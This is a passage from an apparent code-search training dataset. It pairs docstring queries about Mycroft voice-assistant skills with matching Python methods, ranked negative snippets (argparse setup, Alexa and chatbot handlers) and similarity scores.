exit\"\"\"\n\n def __call__(self, parser, namespace, values, option_string=None):\n print(\"\\n\".join(areas))\n parser.exit()\n\n parser = argparse.ArgumentParser(parents=[kcs_parser],\n conflict_handler='resolve')\n\n parser.add_argument('files', nargs='+', help=\"Input files\")\n parser.add_argument('--area', action='append', required=True,\n choices=areas, help=\"One or more area names\")\n parser.add_argument('--template',\n help=\"Output path template, including subdirectory\")\n parser.add_argument('-v', '--verbosity', action='count',\n default=0, help=\"Verbosity level\")\n parser.add_argument('-P', '--nproc', type=int, default=1,\n help=\"Number of simultaneous processes\")\n parser.add_argument('--list-areas', action=ListAreas, nargs=0,\n help=\"List availabe areas and quit\")\n parser.add_argument('--regrid', action='store_true',\n help=\"Regrid the data (to a 1x1 deg. grid)\")\n parser.add_argument('--no-save-results', action='store_true',\n help=\"Store the resulting extracted datasets on disk\")\n parser.add_argument('--no-average-area', action='store_true',\n help=\"Don't average the extracted areas\")\n parser.add_argument('--tempdir')\n parser.add_argument('--subdir-per-realization', action='store_true')\n parser.add_argument('--ignore-common-warnings', action='store_true')\n\n args = parser.parse_args()\n setup_logging(args.verbosity)\n read_config(args.config)\n\n if args.template is None:\n args.template = default_config['data']['extraction']['template']\n args.save_result = not args.no_save_results\n args.average_area = not args.no_average_area\n args.area = {name: default_config['areas'][name] for name in args.area}\n args.area = {key: None if value == 'global' else value for key, value in args.area.items()}\n return args", "def get_options():\n\n description = \"\"\" Creates an scoring matrix for a given alignment \"\"\"\n \n parser = argparse.ArgumentParser(description=description,\n formatter_class=RawDescriptionHelpFormatter)\n # Standard Input\n standard = parser.add_argument_group(title='Standard input',\n description='Standard input for tools.')\n standard.add_argument('-i', \"--input\", dest=\"input\", action='store',\n required=True, help=\"Path for input alignment\")\n standard.add_argument('-o', \"--output\", dest=\"output\", action='store',\n required=True, help=\"Path to output matrix in wide format.\")\n\n args = parser.parse_args()\n\n # Standardize paths\n args.input = os.path.abspath(args.input)\n args.output = os.path.abspath(args.output)\n\n return args" ]
[ "0.5959439", "0.5875722", "0.5843192", "0.5764533", "0.5762908", "0.57036674", "0.5702611", "0.56741303", "0.56671953", "0.5666019", "0.56415075", "0.5633455", "0.5577047", "0.55590963", "0.5546385", "0.55420923", "0.5530415", "0.55239266", "0.5492701", "0.5489848", "0.54787415", "0.54610515", "0.54600614", "0.5459616", "0.54539835", "0.5447735", "0.5431581", "0.5429711", "0.5415869", "0.5409023" ]
0.8013772
0
Get a message to speak on first load of the skill. Useful for postinstall setup instructions.
def get_intro_message(self): self.speak_dialog("thank.you") return None
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def speak(message):\n print(message)", "def speak(self):\n print(\"meow!\")", "def speak(self):\n print(\"hello\")", "def install_default_skills(speak=True):\n if exists(MSM_BIN):\n p = subprocess.Popen(MSM_BIN + \" default\", stderr=subprocess.STDOUT,\n stdout=subprocess.PIPE, shell=True)\n (output, err) = p.communicate()\n res = p.returncode\n if res == 0 and speak:\n # ws.emit(Message(\"speak\", {\n # 'utterance': mycroft.dialog.get(\"skills updated\")}))\n pass\n elif not connected():\n LOG.error('msm failed, network connection is not available')\n ws.emit(Message(\"speak\", {\n 'utterance': mycroft.dialog.get(\"no network connection\")}))\n elif res != 0:\n LOG.error('msm failed with error {}: {}'.format(res, output))\n ws.emit(Message(\"speak\", {\n 'utterance': mycroft.dialog.get(\n \"sorry I couldn't install default skills\")}))\n\n else:\n LOG.error(\"Unable to invoke Mycroft Skill Manager: \" + MSM_BIN)", "def get_intro_message() -> str:\n return \"\"\"You are about to begin a new record.\nType the text sample you want to record.\nThis first sample MUST be typed by the real user (no impostor data).\"\"\"", "def get_init_response():\n speechOutput = GET_INIT_MESSAGE \n\n return response(speech_response_ssml(speechOutput, False))", "def on_launch():\n return get_welcome_message()", "async def speak(ctx, *, message: commands.clean_content):\n await _speak(ctx, \"en\", \"com\", message)", "async def on_start(self):\n m = \"**{}** has started a game of {}! To participate, say `I`! **{} players needed.**\".format(\n self.message.author.display_name, self.name, self.num)\n await client.say(self.message, m)", "def introductions(self):\n speak('omxplayer {0}'.format(os.path.join(self.audio_commands, 'introductions3.ogg')))\n speak('omxplayer {0}'.format(os.path.join(self.audio_commands, 'request.ogg')))", "def get_hello():\n\n return \"Hello\"", "def hello():\n return 'Hello I like to make AI Apps'", "def on_launch(launch_request, session):\n # Dispatch to your skill's launch message\n return get_welcome_response()", "def talk(self):\n if self.location.character:\n return self.location.character.talk()\n else:\n return \"There is no one to talk to.\"", "async def help_skill(self, message):\n logging.debug(\"searching for {}\".format(message.regex))\n found_skill = next(\n (\n skill\n for skill in self.opsdroid.skills\n if skill.__name__ == message.regex.group(1)\n ),\n False,\n )\n if not found_skill:\n response = \"{} skill not found\".format(message.regex.group(1))\n elif not found_skill.__doc__:\n response = \"No usage found for {}\".format(found_skill.__name__)\n else:\n response = found_skill.__doc__\n await message.respond(response)", "def get_welcome_message(restart=False):\n print(\"get_welcome_message, restart: \", str(restart))\n\n if restart == True:\n message = \"OK, wir starten ein neues Spiel.\" + SPIELER_PROMPT_TEXT\n else:\n message = WELCOME_MESSAGE\n \n reprompt_text = SPIELER_PROMPT_TEXT\n\n return response(speech_response=message, should_end_session=False,\\\n reprompt_text=reprompt_text, card_text=WELCOME_MESSAGE)", "async def help(self, message):\n response = []\n for skill in self.opsdroid.skills:\n if skill.__doc__:\n response.append(\"{}: {}\".format(skill.__name__, skill.__doc__))\n else:\n doc_string_not_found = \"doc string not found for {}\".format(\n skill.__name__\n )\n logging.debug(doc_string_not_found)\n response.append(skill.__name__)\n await message.respond(\"\\n\".join(sorted(response)))", "async def say_hello(self, ctx: MyContext):\n _ = await ctx.get_translate_function()\n\n await ctx.send(_(self.config()[\"hello_message\"]))", "def on_launch(launch_request, session):\r\n # Dispatch to your skill's launch message\r\n return get_welcome_response()", "def announce_target(self):\n letter = self.bubbles[self.target].letter\n question = self.load_sound(\"question-\" + letter + \".wav\")\n question.play()\n if android: # get_length() not supported by android.mixer\n ms = 2000 \n else:\n ms = int(question.get_length()*1000)\n pygame.time.set_timer(Game.ANNOUNCE_EVENT, ms)\n self.state = Game.ANNOUNCE_STATE", "def welcome():\n on_session_start()\n return question(PRIME_QUESTION, intro=WELCOME_SPEECH)", "def handle_speak(event):\n context = {'client_name': 'mycroft_listener',\n 'source': 'audio',\n 'destination': [\"skills\"]}\n bus.emit(Message('speak', event, context))", "def find_start_recognition_message(self):\n messages = self.find_messages_by_type(\"StartRecognition\")\n assert len(messages) == 1\n return messages[0]", "def start(update,context):\r\n update.message.reply_text('welcome to voice bot')", "def func(self):\n if not self.args:\n self.msg(\n \"{wYou are currently speaking:{n %s\"\n % self.caller.languages.current_language.capitalize()\n )\n self.list_languages()\n return\n if \"translate\" in self.switches:\n obj = self.caller.search(self.args)\n if not obj:\n return\n translation = obj.item_data.translation\n matches = False\n for lang in self.caller.languages.known_languages:\n if lang in translation:\n self.msg(\n \"You translate the following from %s:\\n%s\"\n % (lang.capitalize(), translation[lang])\n )\n matches = True\n if not matches:\n self.msg(\n \"%s does not seem to contain any foreign tongue you can read.\" % obj\n )\n return\n if not self.switches:\n args = self.args.lower()\n if args == \"arvani\" or args == \"common\":\n self.caller.attributes.remove(\"currently_speaking\")\n self.msg(\"{wYou are now speaking Arvani.{n\")\n return\n if args not in self.caller.languages.known_languages:\n self.msg(\"You cannot speak %s.\" % self.args)\n self.list_languages()\n return\n self.caller.db.currently_speaking = args\n self.msg(\"{wYou are now speaking %s.{n\" % self.args)\n return\n player = self.caller.player.search(self.lhs)\n if not player:\n return\n targ = player.char_ob\n if not targ:\n self.msg(\"Not found.\")\n return\n if \"teachme\" in self.switches:\n if self.caller.languages.additional_languages <= 0:\n self.msg(\n \"You need a higher rank of linguistics before you can learn anything else.\"\n )\n return\n req = targ.ndb.language_requests or {}\n req[self.caller] = self.rhs\n targ.ndb.language_requests = req\n self.msg(\"You request that %s teach you %s.\" % (targ, self.rhs))\n targ.msg(\n \"{w%s has requested that you teach them %s.{n\" % (self.caller, self.rhs)\n )\n return\n if \"teach\" in self.switches:\n req = self.caller.ndb.language_requests or {}\n if targ not in req:\n self.msg(\"You do not have a request from %s.\" % targ)\n return\n lang = req[targ].lower()\n if lang not in self.caller.languages.known_languages:\n self.msg(\"You do not know %s.\" % lang)\n self.list_languages()\n return\n if targ.languages.max_languages <= len(targ.languages.known_languages):\n self.msg(\"They know as many languages as they can learn.\")\n return\n targ.languages.add_language(lang)\n self.msg(\"You have taught %s to %s.\" % (lang, targ))\n targ.msg(\"%s has taught you %s.\" % (self.caller, lang))\n return", "def on_launch(launch_request, session):\n # Dispatch to your skill's launch\n return get_welcome_response()", "def test_get_skill_name(self):\n result = self.runner.invoke(\n cli,\n [*CLI_LOG_OPTION, \"config\", \"get\", \"skills.dummy.name\"],\n standalone_mode=False,\n )\n assert result.exit_code == 0\n assert result.output == \"dummy\\n\"", "async def on_ready(self):\n self.send_message = self.bot.get_cog('Text').send_message", "def speak(self, what):\n if isinstance(what, str):\n return self.whatever()\n\n what = self.clean(what)\n if not what or what == '':\n return self.silence()\n if what.isupper():\n return self.shouting()\n if what.endswith('?'):\n return self.asking()\n return self.whatever()", "async def speaklang(ctx, language, *, message: commands.clean_content):\n await _speak(ctx, language, \"com\", message)" ]
[ "0.61970544", "0.59956497", "0.5926281", "0.5872123", "0.58696866", "0.5797025", "0.579132", "0.57152486", "0.5705992", "0.56784135", "0.56503886", "0.5580634", "0.552781", "0.55209553", "0.55069524", "0.5461222", "0.54496735", "0.5446346", "0.5446035", "0.54340476", "0.54330224", "0.5403676", "0.5394272", "0.53837305", "0.5383698", "0.53715837", "0.5345385", "0.53420013", "0.53122133", "0.5290316" ]
0.6545299
0
Handle conversation. This method gets a peek at utterances before the normal intent handling process after a skill has been invoked once. To use, override the converse() method and return True to indicate that the utterance has been handled.
def converse(self, utterances, lang="en-us"): # check if game was abandoned midconversation and we should clean it up self.maybe_end_game() if self.playing: ut = utterances[0] # if self will trigger do nothing and let intents handle it if self.will_trigger(ut): # save / restore will trigger return False # capture speech and pipe to the game words = ut.split(" ") self.speak_output(self.game.do_command(words)) self.make_active() return True return False
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def handle_converse_request(message):\n skill_id = int(message.data[\"skill_id\"])\n utterances = message.data[\"utterances\"]\n lang = message.data[\"lang\"]\n global ws, loaded_skills\n # loop trough skills list and call converse for skill with skill_id\n for skill in loaded_skills:\n if loaded_skills[skill][\"id\"] == skill_id:\n try:\n instance = loaded_skills[skill][\"instance\"]\n except:\n LOG.error(\"converse requested but skill not loaded\")\n ws.emit(Message(\"skill.converse.response\", {\n \"skill_id\": 0, \"result\": False}))\n return\n try:\n result = instance.converse(utterances, lang)\n ws.emit(Message(\"skill.converse.response\", {\n \"skill_id\": skill_id, \"result\": result}))\n return\n except:\n LOG.error(\n \"Converse method malformed for skill \" + str(skill_id))\n ws.emit(Message(\"skill.converse.response\",\n {\"skill_id\": 0, \"result\": False}))", "def handleForever(self):\n self._logger.info(\"Starting to handle conversation with keyword '%s'.\",\n self.persona)\n while True:\n # Print notifications until empty\n notifications = self.notifier.getAllNotifications()\n for notif in notifications:\n self._logger.info(\"Received notification: '%s'\", str(notif))\n\n\n self._logger.debug(\"Started listening for keyword '%s'\",\n self.persona)\n\n print(\"conversation >> start listening for keyword %s\" % self.persona)\n\n threshold, is_conversation_desired = self.mic.passiveListen(self.persona)\n self._logger.debug(\"Stopped listening for keyword '%s'\",\n self.persona)\n\n\n print(\"conversation >> stopped listening for keyword %s\" % self.persona)\n\n if not is_conversation_desired:\n self._logger.info(\"Nothing has been said or transcribed.\")\n print(\">> Nothing has been said or transcribed.\")\n continue\n self._logger.info(\"Keyword '%s' has been said!\", self.persona)\n\n print(\"conversation >> Keyword %s has been said!\" % self.persona)\n\n self._logger.debug(\"Started to listen actively with threshold: %r\",\n threshold)\n\n print(\"conversation >> Started to listen actively with threshold: %r\" % threshold)\n\n input = self.mic.activeListenToAllOptions(threshold)\n self._logger.debug(\"Stopped to listen actively with threshold: %r\",\n threshold)\n\n print(\"conversation >> Stopped listening\")\n\n if input:\n print(\"conversation >> recieved input: \" + str(input))\n print(\"conversation >> Sending '{0}' to brain\".format(input.get(\"_text\")))\n self.brain.query(input.get(\"_text\"))\n else:\n messages = [\"You know, I can't help you if you mumble like that.\"\n ,\"Does not compute, how about we try this again.\"]\n\n message = random.choice(messages)\n\n self.mic.say(message)", "def handle(self, talk_action):\n target = talk_action.target\n action = talk_action.action\n logging.debug(\n \"Target: %s. Action: %s. Connections: %s\" % (target, action, len(self.tcp_clients))\n )\n if action == \"INITIATE\":\n logging.debug(\n \">>> Starting VoIP conversation for '%s'\" % self.session_key\n )\n self.voip()\n elif action == \"DENY\":\n for client in self.tcp_clients:\n if client is not talk_action.instigator:\n client.server.queue_message(\n \"TALK %s: DENIED\" % self.session_key,\n client.sock\n )\n elif action == \"ACCEPT\":\n for client in self.tcp_clients:\n if client is not talk_action.instigator:\n client.server.queue_message(\n \"TALK %s: ACCEPTED\" % self.session_key,\n client.sock\n )", "def on_intent(event):\n\n intent = event[\"request\"][\"intent\"][\"name\"]\n\n if intent in (\"AMAZON.CancelIntent\", \"AMAZON.StopIntent\", \"AMAZON.NoIntent\"):\n return handle_session_end_request()\n\n if intent == \"AMAZON.YesIntent\":\n if \"attributes\" in event[\"session\"] and \"previousIntent\" in \\\n event[\"session\"][\"attributes\"]:\n\n if event[\"session\"][\"attributes\"][\"previousIntent\"] == \"AMAZON.HelpIntent\":\n return main_handler(event)\n\n speech_output = event[\"session\"][\"attributes\"][\"nextStations\"]\n resp = build_speechlet_response(CARD_TITLE, speech_output, True)\n return build_response(resp)\n\n speech_output = \"Sorry, something went wrong.\"\n resp = build_speechlet_response(CARD_TITLE, speech_output, True)\n return build_response(resp)\n\n if intent == \"isBikesAvailable\":\n return main_handler(event)\n\n if intent == \"AMAZON.HelpIntent\":\n return handle_help_intent()\n\n speech_output = \"Sorry, I don\\'t know that.\"\n resp = build_speechlet_response(CARD_TITLE, speech_output, True)\n return build_response(resp)", "def speech_callback(self, data):\n speech = data.data\n print \"RECEIVED SPEECH: \", speech\n if \"keyword detected\" in speech:\n if self.idling:\n self.control_pub.publish(\"ft go; idle stop; stt go\")\n self.behav_pub.publish(\"greet\")\n # self.behav_pub.publish(random.choice(categorized_behaviors['greeting']))\n elif \"play\" in speech:\n print \"STARTING GAME\"\n self.start_game = \"TTT\"\n elif \"bye\" in speech:\n self.control_pub.publish(\"idle go; stt go; stt_keyword go\")\n elif \"okay\" in speech:\n self.ok = True", "def _emit_utterance_to_skills(message_to_emit: Message) -> bool:\n # Emit single intent request\n ident = message_to_emit.context['ident']\n resp = bus.wait_for_response(message_to_emit, timeout=10)\n if not resp:\n LOG.error(f\"Skills didn't handle {ident}!\")\n return False\n return True", "def onCurrentSentence(self, *_args):\n global instance\n log(str(_args))\n #if (instance.isSpeaking and len(_args[1])==0): instance.SpeakDone()\n return", "def talk(self):\r\n if self.conversation is not None:\r\n print(\"[\" + self.name + \" says]: \" + self.conversation)\r\n else:\r\n print(self.name + \" doesn't want to talk to you\")", "def speak(self):\n # Speaks randomly to another agent on the same cell\n anticipated_meaning = None\n cellmates = self.model.grid.get_cell_list_contents([self.pos])\n\n # If other agents on the same cell\n if len(cellmates) > 1:\n hearer = self.random.choice(cellmates)\n\n while (hearer == self): # agents should not talk to themselves\n hearer = self.random.choice(cellmates)\n\n meaning = self.random.choice(self.model.schedule.agents).unique_id\n\n # If the speaker is not acquainted with the meaning\n if meaning not in self.meanings:\n print(\"New meaning added to speaker\")\n self.meanings.append(meaning)\n return Conversation(word=None, meaning=None, success=0.0)\n\n # If the hearer is not acquainted with the meaning\n if meaning not in hearer.meanings:\n print(\"New meaning added to hearer\")\n hearer.meanings.append(meaning)\n return Conversation(word=None, meaning=None, success=0.0)\n\n # 50% chance of having an anticipated meaning default\n if self.random.random() <= self.model.antecipated_prob:\n print(\" \" + str(self.unique_id) +\n \" points at \" + str(meaning))\n anticipated_meaning = meaning\n\n # If the speaker has a word for the meaning\n if meaning in self.meaning2word:\n word = self.meaning2word[meaning]\n\n # If the hearer has a word for the meaning\n if word in hearer.word2meaning:\n # If the hearer has no anticipated meaning\n if anticipated_meaning == None:\n return Conversation(word=word, meaning=meaning, success=1.0)\n # If anticipated meaning different from hearer meaning\n if (anticipated_meaning != None\n and anticipated_meaning != hearer.word2meaning[word]):\n hearer.delete_link(word)\n hearer.create_link(word, anticipated_meaning)\n return None\n # If anticipated meaning same as hearer meaning\n if (anticipated_meaning != None\n and anticipated_meaning == hearer.word2meaning[word]):\n return Conversation(word=word, meaning=meaning, success=1.0)\n\n # If the hearer has no word for the meaning\n else:\n # If anticipated meaning same as speaker meaning\n if (anticipated_meaning != None\n and word not in hearer.word2meaning\n and anticipated_meaning not in hearer.meaning2word):\n hearer.create_link(word, anticipated_meaning)\n return Conversation(word=word, meaning=meaning, success=0.0)\n\n # If the speaker has no word for the meaning\n if meaning not in self.meaning2word:\n return Conversation(word=None, meaning=meaning, success=0.0)", "def decide_action(self):\t\t\t\t\t#defining the function to decide the action\n recognizer, audio = self.speech.listen_for_audio()\t\t#listening for the audio\n\n # received audio data, now we'll recognize it using Google Speech Recognition\n speech = self.speech.google_speech_recognition(recognizer, audio)\t#storing the speech into variable as a text\n\n if speech is not None:\t\t#if speech is not recognized\n try:\n req = requests.get('https://api.wit.ai/message?v=20160918&q=%s' % speech,\n headers={\"Authorization\": wit_ai_token})\t\t#getting the wit.ait token and checking it\n print req.text\t\t\t#printing the text\n json_responce = json.loads(req.text)\t\t#printing the responce\n entities = None\t\t\t#inititaling the entities\n intent = None\t\t\t#initialising the intent\n if 'entities' in json_responce and 'Intent' in json_responce['entities']:\t#checking the the intents and entitites\n entities = json_responce['entities']\t\t#entities \n intent = json_responce['entities']['Intent'][0][\"value\"]\t#intents \n\n print intent\t#printing the intents\n if intent == 'greeting':\t#checking the intent type\n self.__text_action(self.nlg.greet()) #getting the function of the intent\n elif intent == 'snow white':\t\t#checking the intent type\n self.__text_action(self.nlg.snow_white())\t\t#getting the function of the intent\n elif intent == 'weather':\t\t#checking the intent type\n self.__weather_action(entities)\t#getting the function of the intent\n elif intent == 'news':\t\t\t#checking the intent type\n self.__news_action()\t#getting the function of the intent\n elif intent == 'maps':\t\t\t#getting the function of the intent\n self.__maps_action(entities)\t\t#getting the function of the intent#checking the intent type\n elif intent == 'holidays':\t\t#getting the function of the intent#checking the intent type\n self.__holidays_action()\t\t\t#getting the function of the intent#checking the intent type\n elif intent == 'appearance':\t\t#getting the function of the intent#checking the intent type\n self.__appearance_action()\t\t#getting the function of the intent#checking the intent type\n elif intent == 'user status':\t\t#getting the function of the intent#checking the intent type\n self.__user_status_action(entities)\t\t#getting the function of the intent#checking the intent type\n elif intent == 'user name':\t\t\t#getting the function of the intent#checking the intent type\n self.__user_name_action()\t\t\t#getting the function of the intent#checking the intent type\n elif intent == 'personal status':\t\t#getting the function of the intent#checking the intent type\n self.__personal_status_action()\t\t#getting the function of the intent#checking the intent type\n elif intent == 'joke':\t\t\t#getting the function of the intent#checking the intent type\n self.__joke_action()\t\t#getting the function of the intent#checking the intent type\n elif intent == 'insult':\t\t#getting the function of the intent#checking the intent type\n self.__insult_action()\t#getting the function of the intent#checking the intent type\n return\t\t\t\t#retuning\n elif intent == 'appreciation':\t\t\t#getting the function of the intent#checking the intent type\n self.__appreciation_action()\t\t\t#getting the function of the intent#checking the intent type\n return\n elif intent == 'music':\t\t\t#getting the function of the intent#checking the intent type\n self.__music_action(music_file)\t\t#getting the function of the intent#checking the intent type\n elif intent == 'navigation':\t\t\t#getting the function of the intent#checking the intent type\n self.__navigate_action()\n elif intent == 'tasks':\n self.__calender_events()\n\t\telif intent == 'guide':\n self.__guide()\n elif intent == 'web':\n self.__web()\n elif intent == 'video':\n self.__video()\n else: # No recognized intent\n self.__text_action(\"I'm sorry, I don't know about this yet.\")\n return\n\n except Exception as e:\n print \"Failed wit !\"\t\t\t#error message\n print(e)\t\t\t#printing the error\n traceback.print_exc()\n self.__text_action(\"I'm sorry, I couldn't understand what you mean !!\") #printing message\n return\t\t\t\t\n\n self.decide_action()", "def respond(sentence):\n cleaned = preprocess_text(sentence)\n parsed = TextBlob(cleaned)\n pprint(\"POSITION Tags\")\n pprint(parsed.pos_tags)\n\n # Loop through all the sentences, if more than one. This will help extract the most relevant\n # response text even across multiple sentences (for example if there was no obvious direct noun\n # in one sentence\n pronoun, noun, adjective, verb = find_candidate_parts_of_speech(parsed)\n\n # If we said something about the bot and used some kind of direct noun, construct the\n # sentence around that, discarding the other candidates\n resp = check_for_comment_about_bot(pronoun, noun, adjective)\n\n # If we just greeted the bot, we'll use a return greeting\n if not resp:\n resp = check_for_greetings(parsed)\n if resp:\n resp = resp + \". Ssup ?\"\n\n if not resp:\n resp = check_for_signout(parsed)\n\n if not resp:\n # If we didn't override the final sentence, try to construct a new one:\n if not pronoun:\n resp = random.choice(NONE_RESPONSES)\n elif pronoun == 'I' and not verb:\n resp = random.choice(COMMENTS_ABOUT_SELF)\n else:\n resp = construct_response(pronoun, noun, verb)\n\n # If we got through all that with nothing, use a random response\n if not resp:\n resp = random.choice(NONE_RESPONSES)\n\n #logger.info(\"Returning phrase '%s'\", resp)\n pprint(\"RETURNING PHRASE\")\n pprint(resp)\n # Check that we're not going to say anything obviously offensive\n # filter_response(resp)\n\n return resp", "def __handle_message_activity(self, activity):\n BotRequestHandler.STATE+=1 ## POORMAN'S STATE TRACKING\n self.send_response(200)\n self.end_headers()\n credentials = MicrosoftAppCredentials(APPID, APPPASSWORD)\n connector = ConnectorClient(credentials, base_url=activity.service_url)\n LUIStext = ''\n\n ## FIRST, GET APPID\n if self.STATE==1:\n if activity.text:\n BotRequestHandler.LUISAPPID=activity.text\n reply = BotRequestHandler.__create_reply_activity(activity, \"You entered application ID: %s\\nNow, please input your subscription key (default: %s):\" % (activity.text,self.LUISAPPKEY))\n\n ## SECOND, GET APPKEY\n elif self.STATE==2:\n if activity.text:\n BotRequestHandler.LUISAPPKEY=activity.text\n reply = BotRequestHandler.__create_reply_activity(activity, \"Great! You entered application key: %s\\nNow, enter some text for the LUIS model to render:\" % activity.text)\n\n ## THIRD AND ONWARDS: SEND TEXT TO LUIS AND REPORT LUIS RESPONSE TO THE USER\n else:\n try:\n CLIENT = LUISClient(self.LUISAPPID, self.LUISAPPKEY, True)\n res = CLIENT.predict(activity.text)\n while res.get_dialog() is not None and not res.get_dialog().is_finished():\n TEXT = input('%s\\n'%res.get_dialog().get_prompt())\n res = CLIENT.reply(TEXT, res)\n LUIStext=self.__handle_LUIS_response(res)\n reply = BotRequestHandler.__create_reply_activity(activity, 'LUIS says: %s' % LUIStext)\n except Exception as exc:\n LUIStext=exc\n print(\"Error: %s\" % exc)\n reply = BotRequestHandler.__create_reply_activity(activity, 'About %s, LUIS complains: %s' % (activity.text,LUIStext))\n\n connector.conversations.send_to_conversation(reply.conversation.id, reply)", "def handle_message(self, msg, status):\n\n body = ensure_unicode(msg.Body)\n chat_id = get_chat_id(msg.Chat)\n\n if len(body) == 0:\n return False\n\n for name, cmd in self.commands.items():\n if body == name:\n cmd(msg, chat_id)\n return True\n\n\n if self.troller_is_running.get(chat_id):\n response = self.alice.respond(body)\n if response:\n msg.Chat.SendMessage(response)\n return True\n else:\n return False\n else:\n return False", "def response(sentence, model, user_id='123', context={}, show_details=False):\n # Load intents\n data_path = os.path.join(\"data/\", \"data_intents.json\")\n with open(data_path) as json_data:\n intents = json.load(json_data)\n\n # Classify sentence\n results = classify(sentence, model)\n # if we have a classification then find the matching intent tag\n if results:\n # loop as long as there are matches to process\n while results:\n for i in intents['intents']:\n # find a tag matching the first result\n if i['tag'] == results[0][0]:\n # set context for this intent if necessary\n if 'context_set' in i:\n if show_details: print('context:', i['context_set'])\n context[user_id] = i['context_set']\n\n # check if this intent is contextual and applies to this user's conversation\n if not 'context_filter' in i or \\\n (user_id in context and 'context_filter' in i and i['context_filter'] == context[user_id]):\n if show_details: print ('tag:', i['tag'])\n # a random response from the intent\n if i[\"tag\"] == \"goodbye\":\n print(random.choice(i['responses']))\n sys.exit()\n else:\n return print(random.choice(i['responses']))\n\n results.pop(0)", "def func(self):\n\n # Set up function variables.\n caller = self.caller\n rplist = self.rhs.split(\":\") if self.rhs else None\n\n # Find and confirm suitability of target.\n if not self.args:\n caller.msg(\"Talk to whom?\")\n return\n\n target = caller.search(self.args,\n typeclass=NPC,\n nofound_string=\"You cannot talk to {}.\".format(self.args))\n if not target:\n return\n\n # Handle roleplay entries.\n if rplist:\n for text in rplist:\n if text[0] in [\"'\"]:\n caller.execute_cmd(\"Say \" + text[1:])\n else:\n caller.execute_cmd(\"Pose \" + text)\n\n # Call use_object hook on object.\n target.at_talk(caller)", "async def test_intent(self, dm):\n request = create_request(\"other\", \"intent\")\n result = await dm.apply_handler(request, create_responder(request))\n assert result.dialogue_state == \"intent\"", "def run_model(self, chat: Tuple[str, str]) -> Optional[DialogueObject]:\n\n if chat[1] == \"ipdb\":\n ipdb.set_trace()\n\n if len(self.dialogue_stack) > 0 and self.dialogue_stack[-1].awaiting_response:\n return None\n\n # chat is a single line command\n speaker, chatstr = chat\n preprocessed_chatstrs = preprocess.preprocess_chat(chatstr)\n\n # Push appropriate DialogueObjects to stack if incomign chat\n # is one of the scripted ones\n if any([chat in self.botCapabilityQuery for chat in preprocessed_chatstrs]):\n return BotCapabilities(**self.dialogue_object_parameters)\n if any([chat in self.botGreetings for chat in preprocessed_chatstrs]):\n return BotGreet(**self.dialogue_object_parameters)\n if any([\"debug_remove\" in chat for chat in preprocessed_chatstrs]):\n return BotVisionDebug(**self.dialogue_object_parameters)\n\n # don't use preprocess for ttad, done in the model code\n action_dict = self.ttad(s=chatstr, model=self.ttad_model)\n return self.handle_action_dict(speaker, action_dict, preprocessed_chatstrs[0])", "def handle_communications(self):\n\n packet = True\n\n while packet:\n\n # Try to fetch a packet from the analyzer.\n packet = self.fetch_packet_from_analyzer()\n\n # If we got one, handle using it in our UI.\n if not packet:\n break\n\n self.handle_incoming_packet(packet)", "def handle(self, handler_input):\n speech = \"I'm a sample Alexa Skill. Let me give you a random Chuck Norris Fact. \"\n speech += getChuckFact()\n speech += \". Do you want more awesome Chuck facts?\"\n \n \"\"\"\n Take note of the set_should_end_session. If set to 'True', the alexa\n skill will gracefully end execution.AbstractExceptionHandler\n \n The set_card method specifies what kind of cards do you want to use when\n interacting with the user via display. A 'SimpleCard' display's text.\n \n For more info about cards, see:\n https://developer.amazon.com/docs/custom-skills/include-a-card-in-your-skills-response.html\n \"\"\"\n handler_input.response_builder.speak(speech).set_card(\n SimpleCard(speech)).set_should_end_session(False)\n return handler_input.response_builder.response", "async def on_message_activity(self, turn_context: TurnContext):\n reply = MessageFactory.list([])\n # Get the state properties from the turn context.\n welcome_user_state = await self.user_state_accessor.get(\n turn_context, WelcomeUserState\n )\n\n if not welcome_user_state.did_welcome_user:\n welcome_user_state.did_welcome_user = True\n\n text = turn_context.activity.text.lower()\n\n if text in (\"hello\", \"hi\",\"intro\",\"help\",\"menu\"):\n #await self.__send_intro_card(turn_context)\n reply.attachments.append(self.create_signin_card())\n await turn_context.send_activity(reply)\n\n \n else:\n # This example hardcodes specific utterances. You should use LUIS or QnA for more advance language\n # understanding.\n print(\"Printing action------\",turn_context.activity.text)\n print(\"Printing JSON------\",turn_context._activity.value)\n \n\n if turn_context._activity.value is not None:\n print(\"Printing type------\",turn_context._activity.value[\"type\"])\n print(\"Printing customer id------\",turn_context._activity.value[\"customerId\"])\n print(\"Printing password------\",turn_context._activity.value[\"password\"])\n\n customerId = turn_context._activity.value[\"customerId\"]\n password = turn_context._activity.value[\"password\"]\n terms = turn_context._activity.value[\"terms\"]\n isvalid = True\n if (customerId is None) or (str(customerId).strip()==\"\"):\n isvalid = False\n await turn_context.send_activity(\"Please enter valid Customer ID\")\n if (password is None) or (str(password).strip()==\"\"):\n isvalid = False\n await turn_context.send_activity(\"Please enter valid Password\")\n if (terms is None or terms in (\"false\")):\n isvalid = False\n await turn_context.send_activity(\"Please accept the terms and conditions.\")\n\n if (isvalid and turn_context._activity.value[\"type\"] in (\"Login\")):\n # defining a params dict for the parameters to be sent to the API\n PARAMS = {'userName': customerId, 'password': password}\n # sending get request and saving the response as response object\n r = requests.get(url=\"http://localhost:8080/login\", params=PARAMS)\n # extracting data in json format\n data = r.json()\n print(\"printing response \", data[\"loginStatus\"])\n if (data[\"loginStatus\"] is not None and data[\"loginStatus\"] in (\"success\")):\n await turn_context.send_activity(\"Login Succeded\")\n await turn_context.send_activity(\"An OTP is sent to your registered mobile number xxxxxxxx90.\")\n await turn_context.send_activity(\"Please enter the OTP.\")\n else:\n await turn_context.send_activity(\"Login Failed. Please try again\")\n # for key in turn_context._activity.value:\n # print(turn_context._activity.value[key])\n \n else:\n text = turn_context.activity.text.lower()\n \n if text in (\"369\"):\n await turn_context.send_activity(\"Thanks!!\")\n await self.__send_intro_card(turn_context)\n elif text in (\"sign-in\", \"login\"):\n await self.__login_otp_card_card(turn_context)\n elif text in (\"hello\", \"hi\",\"intro\",\"help\",\"menu\"):\n await self.__send_intro_card(turn_context)\n #await turn_context.send_activity(f\"You said { text }\")\n elif text in (\"account balance\"):\n await self.__send_accountbalance_card(turn_context)\n await turn_context.send_activity(\"Also, your deposit xxxxxxxxx9243 is closed pre-maturely as per your request and amount is credited to your third party account.\")\n elif text in (\"xxxxxxxxx4567\"):\n await self.__list_accountTransaction_card(turn_context)\n await self.__mobile_billDue_card(turn_context)\n elif text in 